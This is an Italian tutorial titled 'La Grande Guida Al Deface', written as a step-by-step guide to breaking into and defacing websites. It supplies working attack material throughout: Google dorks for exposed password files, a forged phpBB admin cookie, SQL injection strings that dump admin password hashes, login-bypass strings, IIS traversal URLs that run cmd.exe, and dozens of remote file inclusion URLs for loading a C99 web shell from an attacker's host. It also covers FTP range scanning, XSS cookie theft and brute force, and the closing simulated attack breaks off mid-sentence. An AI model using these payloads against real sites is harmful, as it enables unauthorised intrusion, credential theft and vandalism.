19/12/2008
La Grande Guida Al Deface
#In questa guida spiegherò diverse tecniche per defacciare un sito in diverse #
#situazioni! #
#All’inizio studieremo le più banali vulnerabilità nel caso le trovaste ma più #
#avanti si comincia con i metodi DRASTICI se nel caso queste piccole vulnerbilità#
#non funzionino #
##########################################
{CAPITOLO 1}
Prima di cominciare con la Pratica ovviamente ci tocca la Teoria!
Prima di tutto dovete sapere cosa significa DEFACE!
Deface significa in parole semplici HACKERARE UN SITO!
Questo è possibile grazie allo sfruttamento di BUG e di alcune tecniche
che andrò a spiegare DOPO!
In questa guida infatti vedremo come comportarci nelle diverse situazioni!
Utilizzeremo:Proxy,Exploit,GoogleHacker!
Tutto Spiegato!
Adesso mettiamoci all’opera!
In ogni Deface dovete sapervi PROXARE!
Nel Secondo capitolo studieremo proprio Questo!
Buona Lettura a tutti da Crashinside =)
{CAPITOLO 2}
In questo capitolo studieremo come PROXARCY!
Proxarcy deriva da PROXY!
Il proxy è un modo per camuffare il nostro IP dietro un altro così in rete quando
tenteremo un attacco non apparirà il nostro vero IP!
Per fare ciò consiglio di scaricare il programma “TOR”
(disponibile su www.crashinside.altervista.org)
Una volta scaricato avviamo l’installazione e spuntiamo
le caselle TOR e PRIVOXY che ve lo chiederà quando dovrete scegliere
i componenti da installare!
Ora,andate in C:ProgrammiTor e avviamo tor.exe
Vi dovrebbe apparire una schermata di DOS.
Ora andiamo in C:ProgrammiPrivoxy e avviamolo!
Si dovrebbe chiudere la schermata di DOS e ora andando nel Browser
e poi nelle opzioni PROXY inserire
HTTP Proxy: localhost
Port: 8118
Ora,aggiorniamo il Browser e andiamo su www.ilmioip.it e noteremo
un ip che non è nostro!
Bene!Adesso noteremo la connessione ultra lenta!Pultroppo i proxy sono così!
VORREI RICORDARE UNA COSA!
SE SIETE PROXATY E TENTATE AD ESEMPIO DI ENTRARE IN MSN NON VI FARà ENTRARE!
DOVRETE PRIMA DISATTIVARLI!
Ok,ora la nostra lezione sul Proxy è finita!
Adesso si fa sul serio!Ci vediamo nel prossimo capitolo
{CAPITOLO 3}
In questo capitoletto parleremo del GOOGLE HACKER!
E cioè???
Cioè che in questo capitolo vedremo come sfruttare GOOGLE
in un altro modo =)
Infatti inserendo alcune STRINGHE chiamate QUERY
potremo scovare SITI VULNERABILI,PASSWORD e tanto altro!
Io vi posto le Query più comuni,e vi spiegherò due comandini
molto utili!
Vi serve solo un pizzico di fantasia per ottenere tutto ciò che volete
ECCO LE QUERY:
allinurl:admin.php site:.edu
Filetype: trova archivio .pdf, .ps, .doc, .xls, .txt, .ppt, .rtf, .asp, .wpd…
“Index of /admin”
“Index of /root”
“Index of /password”
“Index of /” +passwd
allintitle: “index of/admin”
allintitle: restricted filetype:doc site:gov
intitle:”index of private”
allinurl:auth_user_file.txt
intitle:”Index of” config.php
intitle:index.of.etc
filetype:xls username password email
intitle:”Index of” “.htpasswd” “htgroup” -intitle:”dist” -apache -htpasswd.c
intitle:”Index of” “.htpasswd” htpasswd.bak
inurl:config.php dbuname dbpass
intitle:”Index of” master.passwd
intitle:”Index of” .mysql_history
intitle:”index of” trillian.ini
intitle:”Index of” spwd.db passwd -pam.conf
intitle:”Index of” pwd.db
intitle:”Index of” secring.bak
intitle:”Index of” “people.lst”
intitle:”Index of..etc” passwd
intitle:”Index of” passwd passwd.bak
intitle:index.of passlist
intitle:”Index of” .bash_history
intitle:”Index of” .sh_history
site:edu grades admin
filetype:htaccess basic
intitle:”Index of” finances.xls
“This report was generated by WebLog”
“phpinfo.php” –manual
intitle:Index.of robots.txt
intitle:”Index of” _vti_inf.html
intitle:”Index of” service.pwd
intitle:”Index of” shtml.dll
intitle:”Index of” shtml.exe
intitle:”Index of” fpcount.exe
intitle:”Index of” default.asp
intitle:”Index of” htimage.exe
intitle:”Index of” default.asp
intitle:”Index of” AT-admin.cgi
intitle:”Index of” glimpse
intitle:”Index of” guestbook.cgi
intitle:”Index of” perl
intitle:”Index of” show
intitle:”Index of” index.html~
intitle:”Index of” stats.html
inurl:shop “Hassan Consulting’s Shopping Cart Version 1.18″
intitle:”Welcome to Windows 2000 Internet Services”
intitle:”Welcome to IIS 4.0″
“powered by openbsd” +”powered by apache”
“Powered by phpBB 2.0.0″
Le Query ALLINURL: e INURL: vi serviranno
se volete ricevere nelle vostre ricerche
i LINK contenete l’indirizzo che cercate allora
queste fanno a caso vostro!
Quindi se volete ad esempio scovare il modulo
login dell’admin(in siti ASP che vedremo più avanti)
utilizeremo in google:
Allinurl:/admin.asp
Inurl:/admin.asp
Ecc…
Spero di essere stato Chiaro!
Andiamo al prossimo capitolo dove cominceremo a fare sul serio
{CAPITOLO 4}
Ok,in questo capitolo cominciamo a imparare una Tecnica!
Roba facile
Infatti ci occuperemo di Defacciare Forum PhpBB sfruttando
un semplice BUG ovvero cambiando il codice GUEST in QUELLO ADMIN
nel file dei COOKIES
A,una cosa…non andate in crisi se non trovate forum vulnerabili
dato che al giorno d’oggi non ce ne sono tantissimi!
Potrete sempre usare il programma PHPBB DEFACER(disponibile nella sezione DOWNLOAD)
Per defacciare forum phpbb inferiori alla versione 2.0.10
Cominciamo Subito!
Ora in questo capitolo traccerò tutti i passaggi per defacciare i forum PHPBB
1)Andate su un motore di ricerca google o
altavista(consiglio altavista perchè trova + pagine di google quindi più possibilita
di trovare un forum vulnerabile)quindi prendiamo in esempio altavista www.altavista.com
2)Nella ricerca scrivete: Powered By Phpbb 1.0.12
3)Ora cercate un forum vi spiego un trukketto,vedete il link quello con + probabilita di defacing
sn qll ke nel link hanno ad es:
www.forum.com/index.php oppure www.forum.com/index.php?members ecc qnd trovate la 2 opzione cancellate ?members
e rimanete /index.php per arrivare alla pagina iniziale del forum!
4)Andate in C:Documents and SettingsUSERDati applicazioniMozillafirefoxLettereNumeri*(leggete in basso)
*=Dp firefox troverete una serie di lettere e numeri a random xco ogni cartella è diversa,ovviamente in
qst esempio abbiamo preso in esame il BROWSER MOZILLA!
5)Una volta entrato nella cartella clikkate su COOKIES.TXT fate ALT+T e inserite nella ricerca il nome
del sito ke volete defacciare xke in pratica qnd avete aperto il forum php per
l’identificazione vi ha registrato i cookie!
6)Una volta trovato controllate se vi appare una stringa tipo qst:
phpbb2mysql_data se ce l’ha il forum puo essere vulnerabile,dipende tutto dal codice Guest ke troverete
affianco,di solito è: a%3A07Bma puo essere anke diverso!
7)Una volta individuato il codice guest inserite al posto del codice questa
STRINGA:
##################################################################
#a%3A27Bs%3A1122autologinid%22%3Bb%3A1%3A622userid%22%3A1222%227D#
##################################################################
(Piccola parentesi,se al posto del codice GUEST troverete questa stringa,nn si fa niente,il forum nn è vulnerabile!)
8)Ora salvate i cookie(nn clikkate sulla [X] per uscire e fare salva xke mi è capitato d nn salvarmeli quindi FILE,SALVA)
9)Kiudete tt le pagine del browser ke avete,tutte quante altrimenti vi riportera i
cookie cm erano prima!(Naltra parentesi nn fate aggiorna xke nn funziona xD)
10)Riaprite il forum e dovreste essere ADMIN!
P.S nn sempre vi mette admin anke se trovate la data e il codice guest nn significa niente!
Volevo darvi un consiglio,se nel caso entrate cm admin e x caso nn vi esce il pannello admin 2 sn i motivi:
1)L’admin per sicurezza ha creato 1 account admin senza possibilita di entrare nel pannello o qlk del genere
2)Il pannello è nascosto(A ME è CAPITATO)!
Questa era una guida che avevo scritto gia e che potrete trovare sul mio sito!
www.crashinside.altervista.org
Passiamo subito al prossimo capitolo =)
{CAPITOLO 5}
Adesso faremo finta di trovare un sito che vogliamo Hackerare!
Facciamo finta che il sito sia www.sitovittima.it
Ora se il sito è in PHP-NUKE proxandoci
proviamo ad iniettare un SQL-INJECTION!
Ad esempio se il sito ha il motore di RICERCA potremmo iniettare SQL-INJECTION in questo modulo!
Ma,cosa è questo SQL-INJECTION?
L’Sql-Injection è un iniezione di codice e utilizzandolo
potremo riuscire a rubare Password hashate in MD5 ovviamente
contro la volontà del sito!
Ok,dopo questa piccola teoria sull’sql-injection inseriamo il seguente
CODICE(SQL-INJECTION) nel motore di ricerca:
###############################################
#p0hh0nsee%’) UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*#
###############################################
Ovviamente senza i “#”
Adesso se il nostro SQL-INJECTION è andato a BUON FINE ci ritroveremo
uno o più password hashate in MD5 tanto quanto sono gli ADMIN,in più sotto
ci sarà scritto una cosa tipo “CONTRIBUTO DI ZAK” questo ZAK sarà proprio
l’username-admin che utilizzeremo per loggare con la sua password che ora è hashata!
Le password per riconoscerle sono fatte da NUMERI e LETTERE insieme
tipo come se fosse una STRINGA!
Adesso vi chiederete:
Ok,abbiamo sta password HASHATA ma non possiamo LOGGARE dato che è CRIPTATA
Che si fa??????
Bhè potremmo provare a DECRIPTARLA no?
Basta prendere un programmino come MD5 o CAIN & ABEL
(Tutti disponibili su www.crashinside.altervista.org)
inserire l’hash e decriptarlo!
Una volta decriptato basta andare nel modulo di login dell’admin(di solito /admin.php)
inseriamo username inseriamo quello che abbiamo trovato sotto la password
hashata,ovvero dove abbiamo trovato: “CONTRIBUTO DI ZAK”(ZAK è un PURO ESEMPIO!)
Adesso siamo entrati come ADMIN!
Ma,se non fosse Così?ad esempio,se non c’è il modulo SEARCH?
Bhè se non c’è possiamo provare a fare una cosa…
Andiamo ad esempio nel modulo DOWNLOAD
Notiamo l’indirizzo,ad esempio potremo trovare:
www.sitovittima.it/modules.php?name=Download
Se al posto di name=Download inseriamo “name=Search”
Se non si apre niente proviamo a mettere:
www.sitovittima.it/Search.php oppure www.sitovittima.it/index/Search.php
Se non ve lo apre o dice MODULO NON ATTIVO,con il search non si fa nulla!
Proviamo con la TOP10!
Il link della top10 è:
www.sitovittima.it/modules.php?name=Top
Facciamo la stessa cosa per il Search nel caso non ci fosse nella home il modulo Top10
Inseriamo affianco alla stringa modules.php?name=Top
il seguente SQL-INJECTION(SEMPRE DA PROXATY)
##############################################
#&querylang=%20WHERE%201=2%20UNION%20ALL%20SELECT%201,pwd,1,1%20FROM%20nuke_authors#
##############################################
Ora,nella parte dei SONDAGGI(mi sembra)dovreste trovare le Password Hashate!
Fate lo stesso procedimento di sopra e loggate come ADMIN!
VORREI RICORDARE UNA COSA:
AVVOLTE DOPO INIETTATO UN SQL-INJECTION POTREBBE USCIRE UN IMMAGINE CHE DICE
CHE VERRà CONTATTATA LA POLIZIA FBI O ROBA SIMILE!
NON SPAVENTATEVI,è SOLO PER SPAVENTARE
Ora,andiamo al capitolo successivo dove impararete a defacciare un sito in ASP!
{CAPITOLO 6}
In questo capitolo spiegherò come Defacciare siti in piattaforma ASP!
Questo è più semplice!
Ammettiamo il caso che il nostro caro sito(www.sitovittima.it)
sia in ASP,come si agisce?
Semplice,si tenta un ASP-INJECTION nel modulo di login admin!
Di solito è www.sitovittima.it/admin.asp oppure
www.sitovittima.it/login/admin.asp
Se non è così provate a cercare su GOOGLE: ADMIN SITOVITTIMA.IT o qualcosa
del genere,per far trovare il modulo di login dell’admin!
Ora iniettiamo l’ASP-INJECTION{L’ASP INJECTION è UGUALE ALL’SQL-INJECTION
SOLTANTO CHE OVVIAMENTE I CODICI SARANNO DIVERSI}
inserendo:
Username: admin
Password: ‘ or ‘
Adesso,dovrebbe entrarvi come admin!
Se non fosse così,bhè vediamo nei capitoli dove utilizzeremo
del deface avanzato!
Ora passiamo al prossimo Capitolo!
{CAPITOLO 7}
Bene,siamo giunti anche a questo capitolo
Ok,allora cominciamo subito!
Abbiamo tentato l’SQL-INJECTION ma non è andato
abbiamo tentato ASP-INJECTION e manco,allora che si fa?
Si usano metodi Drastici =D
Come si suol dire: “A MALI ESTREMI,ESTREMI RIMEDI” xD
Ok,abbiamo fatto la battuta mo vogliamo vede che dobbiamo fa?
Allora in questi casi se abbiamo fallito con asp e sql injection
Prima di tutto,prendiamo l’ip del sito da Defacciare,facendo finta che il sito sia www.sitovittima.it,in questo modo:
Apriamo il Prompt di Ms-Dos:
START-ESEGUI e scriviamo CMD
Ora scriviamo:
nslookup sitovittima.it
Il prompt risponderà:
Server: ns017dns.fastweb.it
Address: 62.101.81.80
Risposta da un server non di fiducia:
Nome: sitovittima.it
Addresses: 127.0.0.1
Ovviamente l’ip e il sito sono falsi quindi ho messo 127.0.0.1 come esempio
ora,noteremo che appariranno due IP!
Prendiamo il secondo IP,ovvero l’ip del sito!
Ora,ci potrebbe essere molto utile fare un WHOIS!
Piccola parentesi su cosa è il WHOIS:
Con il whois è possibile prendere i dati di registrazione al dominio del sito:
ad es: www.sitovittima.it,dato che è un dominio a pagamento e non gratis tipo altervista,
l’admin ha dovuto dare i propri dati,e quindi facendo un whois è possibile ricavare:
nome,cognome,indirizzo e tanto altro ancora!
Ora,effettuiamo il WHOIS da questo sito:
http://www.ripe.net/index.html
Bene,ora prendiamo un BUON PORT SCANNER(nella sezione Download potete prendere ad es RETINA!)
Facciamo uno scanner e così individueremo tutti i servizi sfruttati dal server!
Ad esempio ci uscirà:
21 [Ftp => File Transfer Protocol] 220 BulletProof FTP Server ready …
22 [OpenSSH 3.1]
80 [Http => World Wide Web, HTTP]HTTP/1.1 400 Bad Request Server: Microsoft-IIS/5.1
135 [epmap => DCE endpoint resolution]
139 [Netbios-ssn => NETBIOS Session Service]
443 [HttpS => Secure HTTP]
445 [Microsoft-Ds]
Adesso si Attacca!
Per attaccare,vediamo se il sito è vulnerabile a qualche vulnerabilità tipo:
Xss,Remote File Include,Sql-Injection,Asp-Injection e così Via(TUTTE TECNICHE SPIEGATE IN GUIDE HACKER)
Se non è vulnerabile potremo provare utilizzando i famicerati EXPLOIT!
Andiamo su siti per Exploit e Vulnerabilità tipo:
www.milw0rm.com
www.securityreason.com
Adesso cerchiamo un exploit adatto ai dati presi,ovvero ai servizi sfruttati(CON IL PORTSCANNER) e al sistema operativo(DAL WHOIS)
e cominciamo a cercare un bel exploit!
Ora avviamo l’exploit,se funge Ok,ma se non funge potremo vedere ad esempio se il sito ha la porta 139 APERTA!
Ovvero quella di Netbios!
Se è così apriamo il prompt di ms-dos e scriviamo questo codice:
NET USE 192.10.10.1IPC$ “” /u:”"
Se vi risponderà:
Esecuzione Comando Riuscita
Abbiamo effetuato una NULL SESSION
Piccola parentesi sulla NULL SESSION:
La NULL SESSION è una connessione stabilita sul netbios
senza essere registrati o altro!
Adesso vediamo i servizi publici del nostro amichetto Mr. Green
Scriviamo nel Prompt:
net view 127.0.0.1
Ci risponderà:
Risorse condivise su 127.0.0.1
Nome condivisione Tipo Utilizzato come Commento
——————————————————-
winnt Disco
SharedDocs Disco
Personale Disco
Esecuzione comando riuscita.
Bhè non dimentichiamoci che abbiamo trovato la porta 80 con il servizio
IIS!
Con questo servizio è possibile sfruttare una vulnerabilità per accedere a tutte
le directory!
Scriviamo nella barra indirizzi del browser uno dei seguenti “EXPLOIT”
Http://www.sitovittima.it/scripts/..%255c.. %255cwinnt/system32/cmd.exe?/c+dir+c:
Http://www.sitovittima.it/msadc/..%225c..%255c..%255c.. %255cwinnt/system32/cmd.exe?/c+dir+c:
Http://www.sitovittima.it/cgi-bin/..%225c..%255c..%255c.. %255cwinnt/system32/cmd.exe?/c+dir+c:
Http://www.sitovittima.it/_vti_cnf/…%255c….c..%255c..%255c.. %255cwinnt/system32/cmd.exe?/c+dir+c:
Http://www.sitovittima.it/_vti_bin/…%255c….c..%255c..%255c.. %255cwinnt/system32/cmd.exe?/c+dir+c:
Altrimenti se ha la porta 139 aperta
sempre su MILW0RM o SECURITYFOCUS troviamo degli exploit o bug per la 139!
Oppure,utilizzare il metodo per entrare nei FILE CONDIVISI
(c’è la guida ENTRARE IN UN HARD DISK TRAMITE NETBIOS nella sezione GUIDE HACKER)
{CAPITOLO 8}
In questo capitolo utilizzeremo il bug del REMOTE FILE INCLUDE!
Quindi utilizzeremo una SHELL:
Tra le più famose troviamo la C99 e la R57!
Nella sezione DOWNLOAD-PROGRAMMI HACKER E UTILITY le trovere
Io consiglio la C99!
Facciamo un po di Teoria =)
############################################
#La C99 è una shell fatta in PHP,che hostandola su un FTP e poi #
#sfruttando il BUG dell’autoiniezione (che ne parleremo più avanti)la#
#iniettate in 1 sito vulnerabile e vi ritroverete d’avanti come un #
#pannello,come se aveste l’FTP d’avanti! #
############################################
Prima di tutto dopo aver scaricato la shell dobbiamo upparla su un FTP
cambiando l’estensione PHP perchè altrimenti la shell non si inietterà
in tutte le Directory!
Quindi rinominiamo la shell in:
C99.jpg
C99.txt
C99.gif
C99.bmp
E via dicendo….
Ora inserirò diversi “EXPLOIT” per sfruttare questo BUG!
Basta inserirli nel browser,dove c’è PATH sarebbe il percorso
tipo www.site.com/index/ ecc
Dove c’è www.site.com sarà il sito vittima
invece dove troveremo [EVIL_SCRIPT] dovrete inserire l’URL della shell che avete uppato
tipo se l’avete uppata su www.mysite.it/c99.txt inserirete ad esempio:
www.site.com/index/includes/content/contact_content.php?root_path=www.mysite.it/c99.txt
Se tutto va bene vi apparirà il pannello della C99!
ECCO GLI EXPLOIT:
################### #################
#http://www.site.com/[path]/includes/content/contact_content.php?root_path=[evil script] #
#http://www.site.com/[path]/adminpanel/includes/add_forms/addbioform.php?root_path=[evil script] #
#http://www.site.com/[path]/adminpanel/includes/add_forms/addfliersform.php?root_path=[evil script] #
#http://www.site.com/[path]/adminpanel/includes/add_forms/addgenmerchform.php?root_path=[evil script] #
#http://www.site.com/[path]/adminpanel/includes/add_forms/addinterviewsform.php?root_path=[evil script]#
#http://www.site.com/[path]/adminpanel/includes/add_forms/addlinksform.php?root_path=[evil script] #
#http://www.site.com/[path]/adminpanel/includes/add_forms/addlyricsform.php?root_path=[evil script] #
#http://www.site.com/[path]/adminpanel/includes/add_forms/addmembioform.php?root_path=[evil script] #
#http://www.site.com/[path]/adminpanel/includes/add_forms/addmerchform.php?root_path=[evil script] #
#http://www.site.com/[path]/adminpanel/includes/add_forms/addmerchpicform.php?root_path=[evil script] #
#http://www.site.com/[path]/adminpanel/includes/add_forms/addnewsform.php?root_path=[evil script] #
#http://www.site.com/[path]/adminpanel/includes/add_forms/addphotosform.php?root_path=[evil script] #
#http://www.site.com/[path]/adminpanel/includes/add_forms/addreleaseform.php?root_path=[evil script] #
#http://www.site.com/[path]/adminpanel/includes/add_forms/addreleasepicform.php?root_path=[evil script]#
#http://www.site.com/[path]/adminpanel/includes/add_forms/addrelmerchform.php?root_path=[evil script] #
#http://www.site.com/[path]/adminpanel/includes/add_forms/addreviewsform.php?root_path=[evil script] #
#http://www.site.com/[path]/adminpanel/includes/add_forms/addshowsform.php?root_path=[evil script] #
#http://www.site.com/[path]/adminpanel/includes/add_forms/addwearmerchform.php?root_path=[evil script] #
#http://www.site.com/[path]/adminpanel/includes/mailinglist/disphtmltbl.php?root_path=[evil script] #
#http://www.site.com/[path]/adminpanel/includes/mailinglist/dispxls.php?root_path=[evil script] #
#http://www.site.com/preload.php?config=owned&func_prog=http://site.com/cmd.gif?&cmd=ls #
#http://www.site.com/index.php?config=owned&func_prog=http://site.com/cmd.gif?&cmd=ls #
#http://www.site.com/missing.php?header_prog=[Evil_Script] #
#http://www.site.com/_inc/footer.php?theme_root=[Evil_Script] #
#http://www.site.com/_inc/header.php?mod_root=[Evil_Script] #
#http://www.site.com/_inc/header.php?theme_root=[Evil_Script] #
#http://www.site.com/_inc/pfooter.php?theme_root=[Evil_Script] #
#http://www.site.com/_inc/pheader.php?theme_root=[Evil_Script] #
#http://www.site.com/_inc/web_statsConfig.php?mod_dir=[Evil_Script] #
#http://www.site.com/_inc/web_statsConfig.php?php_ext=[Evil_Script] #
#http://www.site.com/_mods/email.php?header_prog=[Evil_Script] #
#http://www.site.com/_mods/files.php?header_prog=[Evil_Script] #
#http://www.site.com/_mods/files.php?footer_prog=[Evil_Script] #
#http://www.site.com/_mods/headlines.php?header_prog=[Evil_Script] #
#http://www.site.com/_mods/search.php?header_prog=[Evil_Script] #
#http://www.site.com/_mods/topics.php?header_prog=[Evil_Script] #
#http://www.site.com/_mods/users.php?header_prog=[Evil_Script] #
#http://www.site.com/[livehelperpath]/initiate.php?abs_path=[Evil_Script] #
#http://www.site.com/admanagerpro/common.php?ipath=[Evil_Script] #
#http://www.site.com/templates/deluxe/postreply.php?templatefolder=[Evil_Script] #
#http://www.site.com/templates/deluxe/posting.php?templatefolder=[Evil_Script] #
#http://www.site.com/templates/deluxe/pm/newpm.php?templatefolder=[Evil_Script] #
#http://www.site.com/templates/default/postreply.php?templatefolder=[Evil_Script] #
#http://www.site.com/templates/default/posting.php?templatefolder=[Evil_Script] #
#http://www.site.com/templates/default/pm/newpm.php?templatefolder=[Evil_Script] #
#http://www.site.com/modules/Forums/admin/index.php?phpbb_root_path=[evil_scripts] #
#http://www.site.com/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=[evil_scripts] #
#http://www.site.com/modules/Forums/admin/admin_board.php?phpbb_root_path=[evil_scripts] #
#http://www.site.com/modules/Forums/admin/admin_disallow.php?phpbb_root_path=[evil_scripts] #
#http://www.site.com/modules/Forums/admin/admin_forumauth.php?phpbb_root_path=[evil_scripts] #
#http://www.site.com/modules/Forums/admin/admin_groups.php?phpbb_root_path=[evil_scripts] #
#http://www.site.com/modules/Forums/admin/admin_ranks.php?phpbb_root_path=[evil_scripts] #
#http://www.site.com/modules/Forums/admin/admin_styles.php?phpbb_root_path=[evil_scripts] #
#http://www.site.com/modules/Forums/admin/admin_user_ban.php?phpbb_root_path=[evil_scripts] #
#http://www.site.com/modules/Forums/admin/admin_words.php?phpbb_root_path=[evil_scripts] #
#http://www.site.com/modules/Forums/admin/admin_avatar.php?phpbb_root_path=[evil_scripts] #
#http://www.site.com/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=[evil_scripts] #
#http://www.site.com/modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=[evil_scripts] #
#http://www.site.com/modules/Forums/admin/admin_forums.php?phpbb_root_path=[evil_scripts] #
#http://www.site.com/modules/Forums/admin/admin_mass_email.php?phpbb_root_path=[evil_scripts] #
#http://www.site.com/modules/Forums/admin/admin_smilies.php?phpbb_root_path=[evil_scripts] #
#http://www.site.com/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=[evil_scripts] #
#http://www.site.com/modules/Forums/admin/admin_users.php?phpbb_root_path=[evil_scripts] #
#########################################
Po ce ne sono tanti altri,basta andare su www.milw0rm.com/search/ e cercare
la stringa “Remote File Include”
Per trovare siti vulnerabili ovviamente basta fare qualche ricerca
sfruttando il Google Hacker(Spiegato nel capitolo 3)
{CAPITOLO 9}
In questo capitolo ci occuperemo del PUB SCAN
Il pub scan è una tecnica che con un programmino(che dopo vedremo)
è possibile scannare(deriva da Scannerizzare) interi RANGE
di IP di siti per scovare siti con l’FTP dove si ha
l’accesso anonimo e il diritto di scrittura!
(ELIMINARE DIRECTORY,CREARE DIRECTORY,UPPARE FILE Ecc)
Scarichiamo il programmino GRIMS PING reperibile dal mio sito
oppure su questo link:
http://workshops.prohosting.com/dev/cgi-bi….cgi?PingMirror
Ora configuriamolo:
Installiamo il Grims Ping poi apriamolo e andiamo su:
OPTIONS-PREFERENCES
Ora la linguetta PUBFIND e poi su GENERAL
Dove c’è THREADS [5] TIMEOUT (S)[10]
Inseriamo al posto del 10 l’8!
Questo perchè troverà tutti i siti in quel TEMPO
che è un buon TEMPO!
Ora andiamo in PERMISSIONS e poi GENERAL
Spuntate il quadratino LOG DIRECTORY PERMISSIONS e poi su ADD
selezionate una DIRECTORY dove creare il file permissions.log
Questo infatti a fine SCAN premendo F2 vi appariranno tutti i siti
con diritto di SCRITTURA!
Ora come ultima cosa andiamo su PERMISSIONS e poi LOGGING
e spuntiamo tutte le caselle tranne:
EXCLUDE NONDELETABLE PUBS FROM LOG
EXCLUDE PUBS FROM ANONYMOUS LOG
Ora facciamo SAVE!
Ora clikkiamo in alto su PASTE IP
e inseriamo l’ip del sito!
Se non avete un TARGET preciso mettiamo un IP
possibilmente di siti,andiamo nel PROMPT DI DOS(START-ESEGUI-CMD)
e scriviamo NSLOOKUP Nomesito.it/com/org/net ecc
Prendiamo l’ip e magari se l’ip è:
123.4.5.6 mettiamo:
123.4.5.1
Così che ci scannerizzerà tutto il RANGE!(da 1 a 254)
Ora clikkiamo su ADD MULTIPLE RANGES
Ora clikkate sul SEMAFORO e comincia lo scan!
Alla fine premendo F2 vi appariranno i siti con diritto
di scrittura!
Quindi basterà inserire:
Ftp//IPSITO
per entrare con i permessi di SCRITTURA!
Bene,anche questa tecnica è stata spiegata
Andiamo avanti =)
{CAPITOLO 10}
In questo capitolo ci occuperemo dei siti in JPORTAL!
Cerchiamo sul nostro amato Google le seguenti QUERY:
Codice:
POWERED BY JPORTAL
Ora,vi uscira una lista di siti in JPORTAL!
Apriamone uno e inseriamo la seguente stringa nella barra indirizzi del browser:
Codice:
print.php?what=article&id=X AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id from admins LIMIT 1
dove c’è X inseriamo il numero ID dove (SE IL SITO è VULNERABILE)trovare user e pass dell’admin NON HASHATI!
Quindi proviamo a inserire 1 oppure 2 e vediamo se trovate qlk!
PICCOLO ESEMPIO
Facciamo finta di aver trovato www.sito.com ke è un jportal vulnerabile!
scriviamo:
Codice:
www.sito.com/print.php?what=article&id=2 AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id from admins LIMIT 1
Dovrebbe uscire una scritta strana tipo araba e sotto
USER E PASS DELL’ADMIN!
Ora andiamo in www.sito.com/admin.php
e inseriamo i dati appena presi dal bug!
Ora avrete accesso al pannello di amministrazione!
Altra piccola tecnica di DEFACE
{CAPITOLO 11}
Bene,se siete riusciti ad arrivare fin quì,complimenti
Adesso,dato che siamo in TEMA di DEFACE inserirò anche
come DEFACCIARE I GUESTBOOK
Cerchiamo il LOGIN ADMIN per i guestbook
andando su google e inserendo una delle seguenti Query:
inurl:guestbook/admin/login.php
Alla schermata di login dell’admin del guestbook inserite questi dati:
USER: ‘or ‘jr7′=’jr7′ /*
PASSWORD: anything
QUERY PER LA RICERCA:
inurl:guestbook/admin/login.php
inurl:guestbook/admin.php
inurl:guestbook/login.php
guestbook/login.php
guestbook/admin.php
guestbook/login/admin.php
guestbook/admin/login.php
allinurl:/guestbook/login/admin.php
{CAPITOLO 12}
In questo capitolo ci occuperemo del bug XSS!
Il bug XSS puo essere sfruttato nei motori di RICERCA(non solo PHP-NUKE)
Ammettiamo che nel sito ci sia VALUE CERCA
Allora il codice sarà:
Nel value verrà ricordato il valore che avremo cercato se ad esempio
noi cerchiamo “DOWNLOAD”
Nella pagina del risultato il codice sarà:
Quindi possiamo iniettare qualsiasi codice,e il nostro obbiettivo
sarà iniettare un codice JAVASCRIPT,esempio:
window.alert(”Hacked”);
Se il sito sarà vulnerabile uscirà la scritta Hacked in un allert
Così noi possiamo sfruttare questo BUG per iniettare JAVASCRIPT cattivi
tipo per rubare cookie,password ecc…
Ora andiamo al prossimo capitolo
{CAPITOLO 13}
In questo capitolo ci occuperemo di un metodo DISPERATO
Ovvero il BRUTE FORCE!
Bhè non c’è molto da spiegare dato che è molto semplice!
Scaricate un programma BRUTE FORCE dal mio sito
sezione DOWNLOAD-PASSWORD inserite il link del sito
e cominciate a fare il BRUTE FORCE!
Il bruteforce è una tecnica che prova tutte le combinazioni
possibili fino a quando non trova quella giusta,ovvero la password del’ftp!
In molti programmi BruteForce potrete anche scegliere di fare un DICTIONARY ATTACK
ovvero prova tutte le combinazioni di parole che risiedono in un TXT chiamato
DIZIONARIO!
Questa lezione è finita!
Non c’era molto da dire,ma è giusto che conosciate anche questa tecnica!
{CAPITOLO 14}
BHè,prima di arrivare al 14esimo e ULTIMMO capitolo
dove ci simuleremo un attacco a un sito,
ci occuperemo degli EXPLOIT!
Gli exploit sono fondamentali se si vuole DEFACCIARE
un sito!
Dovete sapere che gli exploit più diffusi sono in:
-C
-C++
-PERL
Per eseguirli ovviamente bisogna avere un COMPILATORE!
Per exploit in C compilatore di C per PERL compilatore in PERL
e via dicendo!(TUTTO REPERIBILE SUL MIO SITO)
Una volta inserito il codice dell’exploit nel compilatore
bisogna compilaro e quindi renderlo un EXE!
Per eseguire un exploit in C dopo averlo compilato
e quindi ora mai diventato un .EXE(Eseguibile)
Andiamo nel PROMPT DI MS-DOS(START-ESEGUI-CMD)
Scriviamo quanto segue:
[CODICE]
Cd C:DIRECTORY DOVE C’è L’EXPLOIT .EXE(esempio:
Cd C:Documents and SettingsUserDesktopExploitsEXPLOIT.exe)
e premiamo INVIO
[FINE CODICE]
Adesso seguiamo le istruzioni ed eseguiamo il nostro EXPLOIT!
Per quelli in PERL bisogna avere l’INTERPRETE in PERL
Reperibile su:
http://activestate.com/Products/Download/D…x?id=ActivePerl
Adesso salviamo il codice dell’exploit su un BLOCCO NOTES
e salviamo con estensione .PL
Ora apriamo il PROMPT di MS-DOS(START-ESEGUI-CMD)
e scriviamo:
[CODICE]
Cd C:PerlBin
INVIO
Perl.exe EXPLOIT.PL
INVIO
[/CODICE]
L’exploit deve risedere per forza in C:PERLBIN
perchè è quì dove c’è L’exe per interpretare L’exploit!
Ora,seguiamo le istruzioni ed eseguiamo il nostro bel EXPLOIT!
Benissimo!
Avete imparato molte tecniche di DEFACE e non solo!
Adesso passiamo all’ultimo capitolo,ovvero dove simuleremo
un DEFACE! =)
{CAPITOLO 15}
Bene!
Siete arrivati fin quà ed ora?
Una simulazione di DEFACE!
Cominciamo subito!
In questa simulazione prenderemo di mira il sito
www.sitovittima.com
Cominciamo!
Ok,ora vediamo subito se il nostro sito è PHP-NUKE,ASP,HTML,PL Ecc
Se è PHP-NUKE proviamo subito con gli SQL-INJECTION
Se si tratta di un sito in ASP proviamo con ASP-INJECTION
Bhè se nel caso non funge ne SQL-INJECTION ne ASP-INJECTION
